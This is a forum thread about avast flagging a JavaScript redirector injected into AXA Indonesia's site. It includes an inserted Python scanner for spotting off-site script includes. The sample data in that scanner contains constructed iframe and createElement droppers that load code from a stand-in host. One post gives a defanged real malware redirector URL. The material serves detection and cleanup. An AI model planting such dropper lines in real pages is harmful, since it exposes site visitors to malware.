Topic: AXA Financial Website was injected with JS:Illredir-CB [Trj]

Yanto.Chiang
Dear All,

I just got information from my friend that one of the biggest financial providers, AXA Financial, had their website injected with JS:Illredir-CB [Trj].
avast! detected that 3 locations were infected:

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the website scanning tool summary, this website got a suspicious category:

http://www.unmaskparasites.com/security-report/


I need to know the exact location in their HTML where the script was injected.


« Last Edit: June 08, 2010, 01:07:02 PM by Yanto.Chiang »
Yanto Chiang | John 3:30 He must increase, but I must decrease.

Pondus
« Last Edit: June 08, 2010, 09:23:12 AM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Yanto.Chiang
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #2 on: June 08, 2010, 05:41:12 AM »
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes, you are right, I just would like to know which part of this website was injected with the script.

cheers,

Pondus
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #3 on: June 08, 2010, 05:43:38 AM »
not sure, but DavidR or Polonus will tell you when they arrive


Yanto.Chiang
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #4 on: June 08, 2010, 05:50:36 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kind advice.

I need this because if I can contact their web administrator it would be helpful for them.

Since their core business is financial transactions, I am afraid it would be harmful for other clients related to AXA Financial.

cheers,

Yanto.Chiang
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #5 on: June 08, 2010, 07:18:20 AM »

According to Wepawet, no harmful script was found at this website:

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js


kubecj
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #6 on: June 08, 2010, 10:08:48 AM »
Definitely a malware redirector. Wepawet does even find the Russian link, but it's down.
Jindrich Kubec

Yanto.Chiang
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #7 on: June 08, 2010, 12:11:52 PM »
Hi kubecj,

Thanks for your kind information and advice.

cheers,

polonus
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #8 on: June 08, 2010, 12:48:27 PM »
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through; suspicious links should be written with wxw or hxtp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
« Last Edit: June 08, 2010, 05:59:34 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
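The chain polonus describes above (a first-party include such as DropDownMenuX.js that has had a createElement dropper appended, pointing at a third-party host on an odd port) is exactly what a site owner has to locate in their own files. The script below is an added example, not code from this thread or from avast, Wepawet or UnmaskParasites: it walks a saved copy of a page and of an included script, lists every `<script src>`, and reports, with line numbers, any line that references a host outside the site or uses common obfuscation calls. The HTML, the JavaScript, the hostnames `axa.example` and `redirector.example` and the port are constructed stand-ins for the example, not the real AXA files.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: two first-party script includes plus an injected
# inline iframe dropper. Stand-ins for the example, not the real AXA files.
SAMPLE_HTML = """<html><head>
<script src="/DropDownMenuX.js"></script>
<script src="http://www.axa.example/ie5.js"></script>
</head><body>
<script>var s=document.createElement('iframe');s.src='http://redirector.example:8080/in.php';s.width=1;s.height=1;document.body.appendChild(s);</script>
</body></html>"""

# Constructed sample of an included menu script with a redirector appended to it.
SAMPLE_JS = """\
// legitimate menu code (constructed stand-in for a menu script)
function showMenu(id) { document.getElementById(id).style.display = 'block'; }
function hideMenu(id) { document.getElementById(id).style.display = 'none'; }
/* injected redirector, constructed for this example */
var s=document.createElement('script');s.src='http://redirector.example:8080/google.com/stats.php';document.body.appendChild(s);
"""

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# DOM-injection and obfuscation calls that commonly accompany an injected redirector.
SUSPICIOUS_CALLS = ("createElement", "document.write", "unescape(", "fromCharCode", "eval(")
OBFUSCATION_CALLS = ("unescape(", "fromCharCode", "eval(")


def same_site(host, site_host):
    """True when host is the site itself or one of its subdomains."""
    return host == site_host or host.endswith("." + site_host)


def find_injected_references(js_source, site_host):
    """Walk a script line by line and report lines that reference a host outside
    site_host or use obfuscation calls; the line number tells the administrator
    where in the file the injected code sits."""
    findings = []
    for lineno, line in enumerate(js_source.splitlines(), 1):
        reasons = []
        for url in URL_RE.findall(line):
            parsed = urlparse(url)
            host = parsed.hostname
            if host and not same_site(host, site_host):
                reasons.append(f"third-party host {host}")
                if parsed.port not in (None, 80, 443):
                    reasons.append(f"non-standard port {parsed.port}")
        calls = [c for c in SUSPICIOUS_CALLS if c in line]
        if any(c in OBFUSCATION_CALLS for c in calls):
            reasons.append("obfuscation call")
        if reasons:
            findings.append({"line": lineno, "reasons": reasons,
                             "calls": calls, "snippet": line.strip()[:80]})
    return findings


class ScriptCollector(HTMLParser):
    """Collect external <script src=...> references and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf)
            if body.strip():
                self.inline.append(body)
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def scan_page(html, site_host):
    """Return every external script URL, the subset that points off-site,
    and the findings from each inline script body."""
    collector = ScriptCollector()
    collector.feed(html)
    third_party = [s for s in collector.external
                   if urlparse(s).hostname and not same_site(urlparse(s).hostname, site_host)]
    inline_findings = []
    for body in collector.inline:
        inline_findings.extend(find_injected_references(body, site_host))
    return {"external_scripts": collector.external,
            "third_party_scripts": third_party,
            "inline_findings": inline_findings}


if __name__ == "__main__":
    report = scan_page(SAMPLE_HTML, "axa.example")
    print("external scripts:", report["external_scripts"])
    for f in report["inline_findings"]:
        print(f"inline script line {f['line']}: {', '.join(f['reasons'])} -> {f['snippet']}")
    for f in find_injected_references(SAMPLE_JS, "axa.example"):
        print(f"menu script line {f['line']}: {', '.join(f['reasons'])} -> {f['snippet']}")
```

Run it against files fetched with a non-browser client (or a copy taken over FTP/SSH from the server) rather than in a browser, and then check every external include the page lists the same way, since the page itself may be clean while an included script like the menu file carries the dropper.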

Yanto.Chiang
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #9 on: June 08, 2010, 01:08:27 PM »
Hi Polonus,

I am sorry for the inconvenience caused, but I already fixed it.

By the way, do you know how to trace the location of those scripts?


polonus
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #10 on: June 08, 2010, 06:17:08 PM »
Hi Yanto.Chiang,

I PM-ed you with extensive instructions on how to do this safely and securely,
good hunt,

polonus